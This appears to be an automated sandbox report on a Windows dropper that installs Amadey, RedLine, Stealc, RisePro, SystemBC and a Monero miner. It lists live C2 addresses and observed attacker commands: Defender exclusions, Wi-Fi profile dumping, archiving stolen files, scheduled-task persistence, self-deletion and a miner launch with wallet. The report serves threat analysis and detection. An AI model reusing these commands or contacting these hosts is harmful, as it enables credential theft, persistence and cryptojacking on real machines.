Resubmissions

08-05-2024 17:38

240508-v78vbshh68 10

07-05-2024 20:46

240507-zkn9mafa5t 10

07-05-2024 15:51

240507-tazpqagb25 10

01-05-2024 23:14

240501-28cxlsca92 10

Analysis

  • max time kernel
    47s
  • max time network
    78s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240419-en
  • resource tags

    arch:x64arch:x86image:win11-20240419-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    07-05-2024 20:46

General

  • Target

    65b13c88ba108bc85331d8fd4c92b5f84d48e63f612085a73eaec353f821ccc3.exe

  • Size

    1.9MB

  • MD5

    cf02058ce59cb0d1f9e9f3146316717f

  • SHA1

    9c276c5d673ad974c0c49e55be5e1952100bbc56

  • SHA256

    65b13c88ba108bc85331d8fd4c92b5f84d48e63f612085a73eaec353f821ccc3

  • SHA512

    5a46d5055bd3e5c94e7214f7600d578cdeadb6de9a4adce17f8d7afb2bc51c35a995fd94d6f16ea7be9b1f5862f6cd7add5d18b7e80b6fc60286041acecdafd7

  • SSDEEP

    49152:V3/bnL0qZ+XLHP19pmfybjyCIaIzRGuyW2/iC2Xxx9lB:VjnLnYXx90abbI3Dy/iC2Xr

Malware Config

Extracted

Family

amadey

Version

4.20

C2

http://193.233.132.139

Attributes
  • install_dir

    5454e6f062

  • install_file

    explorta.exe

  • strings_key

    c7a869c5ba1d72480093ec207994e2bf

  • url_paths

    /sev56rkm/index.php

rc4.plain

Extracted

Family

amadey

Version

4.18

C2

http://193.233.132.56

Attributes
  • install_dir

    09fd851a4f

  • install_file

    explorha.exe

  • strings_key

    443351145ece4966ded809641c77cfa8

  • url_paths

    /Pneh2sXQk0/index.php

rc4.plain

Extracted

Family

risepro

C2

147.45.47.126:58709

Extracted

Family

redline

Botnet

Test1234

C2

185.215.113.67:26260

Extracted

Family

stealc

C2

http://49.13.229.86

Attributes
  • url_path

    /c73eed764cc59dcb.php

Extracted

Family

redline

Botnet

@CLOUDYTTEAM

C2

185.172.128.33:8970

Extracted

Family

systembc

C2

67.211.218.147:4001

Extracted

Family

redline

Botnet

newpub

C2

185.215.113.67:26260

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Detect ZGRat V1 3 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 8 IoCs
  • RisePro

    RisePro stealer is an infostealer distributed by PrivateLoader.

  • Stealc

    Stealc is an infostealer written in C++.

  • SystemBC

    SystemBC is a proxy and remote administration tool first seen in 2019.

  • UAC bypass 3 TTPs 1 IoCs
  • Windows security bypass 2 TTPs 2 IoCs
  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 12 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 44 IoCs
  • Identifies Wine through registry keys 2 TTPs 5 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 6 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 13 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Windows security modification 2 TTPs 3 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 5 IoCs
  • Launches sc.exe 5 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 2 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 32 IoCs
  • Suspicious use of FindShellTrayWindow 47 IoCs
  • Suspicious use of SendNotifyMessage 31 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\65b13c88ba108bc85331d8fd4c92b5f84d48e63f612085a73eaec353f821ccc3.exe
    "C:\Users\Admin\AppData\Local\Temp\65b13c88ba108bc85331d8fd4c92b5f84d48e63f612085a73eaec353f821ccc3.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2228
    • C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
      "C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:3992
      • C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
        "C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"
        3⤵
          PID:1896
        • C:\Users\Admin\AppData\Local\Temp\1000019001\amert.exe
          "C:\Users\Admin\AppData\Local\Temp\1000019001\amert.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:4608
          • C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
            "C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:1424
            • C:\Users\Admin\AppData\Local\Temp\1000066001\swiiiii.exe
              "C:\Users\Admin\AppData\Local\Temp\1000066001\swiiiii.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious use of WriteProcessMemory
              PID:1588
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                6⤵
                  PID:3056
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 1588 -s 844
                  6⤵
                  • Program crash
                  PID:424
              • C:\Users\Admin\AppData\Local\Temp\1000071001\jok.exe
                "C:\Users\Admin\AppData\Local\Temp\1000071001\jok.exe"
                5⤵
                • Executes dropped EXE
                • Modifies system certificate store
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1460
                • C:\Users\Admin\AppData\Local\Temp\pl.exe
                  "C:\Users\Admin\AppData\Local\Temp\pl.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:3604
                  • C:\Users\Public\Pictures\newpub.exe
                    "C:\Users\Public\Pictures\newpub.exe"
                    7⤵
                    • Executes dropped EXE
                    PID:1996
              • C:\Users\Admin\AppData\Local\Temp\1000073001\swiy.exe
                "C:\Users\Admin\AppData\Local\Temp\1000073001\swiy.exe"
                5⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                PID:1724
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  6⤵
                    PID:4892
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    6⤵
                    • Loads dropped DLL
                    • Checks processor information in registry
                    • Suspicious behavior: EnumeratesProcesses
                    PID:3740
                • C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe
                  "C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe"
                  5⤵
                  • UAC bypass
                  • Windows security bypass
                  • Executes dropped EXE
                  • Windows security modification
                  • Checks whether UAC is enabled
                  • Suspicious use of SetThreadContext
                  • System policy modification
                  PID:3076
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe" -Force
                    6⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3572
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
                    6⤵
                      PID:2188
                  • C:\Users\Admin\AppData\Local\Temp\1000079001\gold.exe
                    "C:\Users\Admin\AppData\Local\Temp\1000079001\gold.exe"
                    5⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    PID:3280
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                      6⤵
                        PID:3864
                    • C:\Windows\SysWOW64\rundll32.exe
                      "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
                      5⤵
                      • Loads dropped DLL
                      PID:4656
                      • C:\Windows\system32\rundll32.exe
                        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
                        6⤵
                        • Blocklisted process makes network request
                        • Loads dropped DLL
                        • Suspicious behavior: EnumeratesProcesses
                        PID:1744
                        • C:\Windows\system32\netsh.exe
                          netsh wlan show profiles
                          7⤵
                            PID:1932
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\341999741358_Desktop.zip' -CompressionLevel Optimal
                            7⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3656
                      • C:\Users\Admin\AppData\Local\Temp\1000080001\alexxxxxxxx.exe
                        "C:\Users\Admin\AppData\Local\Temp\1000080001\alexxxxxxxx.exe"
                        5⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        PID:768
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                          6⤵
                            PID:1612
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                            6⤵
                              PID:4640
                              • C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
                                "C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"
                                7⤵
                                • Executes dropped EXE
                                PID:3036
                              • C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe
                                "C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"
                                7⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1728
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
                                7⤵
                                  PID:5432
                                  • C:\Windows\SysWOW64\choice.exe
                                    choice /C Y /N /D Y /T 3
                                    8⤵
                                      PID:3412
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 768 -s 396
                                  6⤵
                                  • Program crash
                                  PID:3088
                              • C:\Users\Admin\AppData\Local\Temp\1000081001\install.exe
                                "C:\Users\Admin\AppData\Local\Temp\1000081001\install.exe"
                                5⤵
                                • Executes dropped EXE
                                • Drops file in Program Files directory
                                PID:3708
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installg.bat" "
                                  6⤵
                                    PID:4520
                                    • C:\Windows\SysWOW64\sc.exe
                                      Sc stop GameServerClient
                                      7⤵
                                      • Launches sc.exe
                                      PID:5056
                                    • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                      GameService remove GameServerClient confirm
                                      7⤵
                                      • Executes dropped EXE
                                      PID:3988
                                    • C:\Windows\SysWOW64\sc.exe
                                      Sc delete GameSyncLink
                                      7⤵
                                      • Launches sc.exe
                                      PID:5152
                                    • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                      GameService remove GameSyncLink confirm
                                      7⤵
                                      • Executes dropped EXE
                                      PID:5164
                                    • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                      GameService install GameSyncLink "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
                                      7⤵
                                      • Executes dropped EXE
                                      PID:5224
                                    • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                      GameService start GameSyncLink
                                      7⤵
                                      • Executes dropped EXE
                                      PID:5304
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installc.bat" "
                                    6⤵
                                      PID:5984
                                      • C:\Windows\SysWOW64\sc.exe
                                        Sc stop GameServerClientC
                                        7⤵
                                        • Launches sc.exe
                                        PID:6044
                                      • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                        GameService remove GameServerClientC confirm
                                        7⤵
                                        • Executes dropped EXE
                                        PID:6060
                                      • C:\Windows\SysWOW64\sc.exe
                                        Sc delete PiercingNetLink
                                        7⤵
                                        • Launches sc.exe
                                        PID:4132
                                      • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                        GameService remove PiercingNetLink confirm
                                        7⤵
                                        • Executes dropped EXE
                                        PID:5056
                                      • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                        GameService install PiercingNetLink "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
                                        7⤵
                                        • Executes dropped EXE
                                        PID:1240
                                      • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                        GameService start PiercingNetLink
                                        7⤵
                                        • Executes dropped EXE
                                        PID:5156
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installm.bat" "
                                      6⤵
                                        PID:5468
                                        • C:\Windows\SysWOW64\sc.exe
                                          Sc delete GameSyncLinks
                                          7⤵
                                          • Launches sc.exe
                                          PID:5496
                                        • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                          GameService remove GameSyncLinks confirm
                                          7⤵
                                          • Executes dropped EXE
                                          PID:5476
                                        • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                          GameService install GameSyncLinks "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
                                          7⤵
                                          • Executes dropped EXE
                                          PID:5520
                                        • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                          GameService start GameSyncLinks
                                          7⤵
                                          • Executes dropped EXE
                                          PID:2112
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
                                        6⤵
                                          PID:5852
                                      • C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe
                                        "C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe"
                                        5⤵
                                        • Executes dropped EXE
                                        PID:4900
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe" /F
                                          6⤵
                                          • Creates scheduled task(s)
                                          PID:5056
                                        • C:\Users\Admin\AppData\Local\Temp\1000244001\ISetup8.exe
                                          "C:\Users\Admin\AppData\Local\Temp\1000244001\ISetup8.exe"
                                          6⤵
                                          • Executes dropped EXE
                                          PID:5264
                                        • C:\Users\Admin\AppData\Local\Temp\1000245001\toolspub1.exe
                                          "C:\Users\Admin\AppData\Local\Temp\1000245001\toolspub1.exe"
                                          6⤵
                                          • Executes dropped EXE
                                          PID:5684
                                        • C:\Users\Admin\AppData\Local\Temp\1000246001\4767d2e713f2021e8fe856e3ea638b58.exe
                                          "C:\Users\Admin\AppData\Local\Temp\1000246001\4767d2e713f2021e8fe856e3ea638b58.exe"
                                          6⤵
                                          • Executes dropped EXE
                                          PID:5300
                                      • C:\Users\Admin\AppData\Local\Temp\1000105001\jgyesfersg.exe
                                        "C:\Users\Admin\AppData\Local\Temp\1000105001\jgyesfersg.exe"
                                        5⤵
                                        • Executes dropped EXE
                                        PID:5532
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.bat" "
                                          6⤵
                                            PID:5712
                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\work.exe
                                              work.exe -priverdD
                                              7⤵
                                              • Executes dropped EXE
                                              PID:5780
                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX1\ogkdraw.exe
                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX1\ogkdraw.exe"
                                                8⤵
                                                • Executes dropped EXE
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                • Drops file in Windows directory
                                                • Suspicious use of SetWindowsHookEx
                                                PID:5892
                                        • C:\Windows\SysWOW64\rundll32.exe
                                          "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
                                          5⤵
                                          • Blocklisted process makes network request
                                          • Loads dropped DLL
                                          PID:348
                                    • C:\Users\Admin\AppData\Local\Temp\1000020001\c7246d8e32.exe
                                      "C:\Users\Admin\AppData\Local\Temp\1000020001\c7246d8e32.exe"
                                      3⤵
                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                      • Checks BIOS information in registry
                                      • Executes dropped EXE
                                      • Adds Run key to start application
                                      • Checks whether UAC is enabled
                                      • Suspicious use of WriteProcessMemory
                                      PID:3320
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
                                        4⤵
                                        • Creates scheduled task(s)
                                        PID:4776
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
                                        4⤵
                                        • Creates scheduled task(s)
                                        PID:3868
                                    • C:\Users\Admin\1000021002\1dcff7c637.exe
                                      "C:\Users\Admin\1000021002\1dcff7c637.exe"
                                      3⤵
                                      • Executes dropped EXE
                                      • Suspicious use of FindShellTrayWindow
                                      • Suspicious use of SendNotifyMessage
                                      • Suspicious use of WriteProcessMemory
                                      PID:4756
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
                                        4⤵
                                        • Drops file in Windows directory
                                        • Enumerates system info in registry
                                        • Modifies data under HKEY_USERS
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                        • Suspicious use of AdjustPrivilegeToken
                                        • Suspicious use of FindShellTrayWindow
                                        • Suspicious use of SendNotifyMessage
                                        • Suspicious use of WriteProcessMemory
                                        PID:2788
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffc8f7cc40,0x7fffc8f7cc4c,0x7fffc8f7cc58
                                          5⤵
                                            PID:4132
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1912,i,11812901730562251053,8766658162081544282,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=1916 /prefetch:2
                                            5⤵
                                              PID:1560
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1828,i,11812901730562251053,8766658162081544282,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=2120 /prefetch:3
                                              5⤵
                                                PID:5052
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2132,i,11812901730562251053,8766658162081544282,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=2280 /prefetch:8
                                                5⤵
                                                  PID:5048
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3076,i,11812901730562251053,8766658162081544282,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=3148 /prefetch:1
                                                  5⤵
                                                    PID:4456
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3084,i,11812901730562251053,8766658162081544282,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=3172 /prefetch:1
                                                    5⤵
                                                      PID:1816
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4140,i,11812901730562251053,8766658162081544282,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=4152 /prefetch:8
                                                      5⤵
                                                        PID:772
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4548,i,11812901730562251053,8766658162081544282,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=4552 /prefetch:8
                                                        5⤵
                                                          PID:1268
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4756,i,11812901730562251053,8766658162081544282,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=4428 /prefetch:3
                                                          5⤵
                                                            PID:960
                                                  • C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
                                                    C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
                                                    1⤵
                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                    • Checks BIOS information in registry
                                                    • Executes dropped EXE
                                                    • Identifies Wine through registry keys
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:1640
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 1588 -ip 1588
                                                    1⤵
                                                      PID:4004
                                                    • C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe
                                                      "C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe"
                                                      1⤵
                                                        PID:3428
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                        1⤵
                                                          PID:1324
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 768 -ip 768
                                                          1⤵
                                                            PID:1192
                                                          • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                            "C:\Program Files (x86)\GameSyncLink\GameService.exe"
                                                            1⤵
                                                            • Executes dropped EXE
                                                            PID:5320
                                                            • C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
                                                              "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
                                                              2⤵
                                                              • Executes dropped EXE
                                                              PID:5384
                                                              • C:\Windows\Temp\999721.exe
                                                                "C:\Windows\Temp\999721.exe" --list-devices
                                                                3⤵
                                                                • Executes dropped EXE
                                                                • Loads dropped DLL
                                                                PID:5416
                                                          • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                            "C:\Program Files (x86)\GameSyncLink\GameService.exe"
                                                            1⤵
                                                            • Executes dropped EXE
                                                            PID:5188
                                                            • C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
                                                              "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
                                                              2⤵
                                                              • Executes dropped EXE
                                                              PID:5352
                                                          • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                            "C:\Program Files (x86)\GameSyncLink\GameService.exe"
                                                            1⤵
                                                            • Executes dropped EXE
                                                            PID:2176
                                                            • C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
                                                              "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
                                                              2⤵
                                                              • Executes dropped EXE
                                                              PID:5568
                                                              • C:\Windows\Temp\401453.exe
                                                                "C:\Windows\Temp\401453.exe" --http-port 14343 -o xmr.2miners.com:2222 -u 83dQM82bj4yY83XKGKHnbHTzqgY4FUt2pi1JS15u7rTs8v84mTU5ny5MiRoSeyduBUAQKFZ6MsvbMHYTisNeThDM3BqQ59y --coin XMR -t 1 --no-color -p x
                                                                3⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                • Suspicious use of FindShellTrayWindow
                                                                PID:5608
                                                          • C:\ProgramData\hcrgjaq\pjvp.exe
                                                            C:\ProgramData\hcrgjaq\pjvp.exe start2
                                                            1⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:4520
                                                          • C:\Windows\system32\NOTEPAD.EXE
                                                            "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\ReceivePop.txt
                                                            1⤵
                                                            • Opens file in notepad (likely ransom note)
                                                            PID:416
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\GroupSync.bat" "
                                                            1⤵
                                                              PID:4484
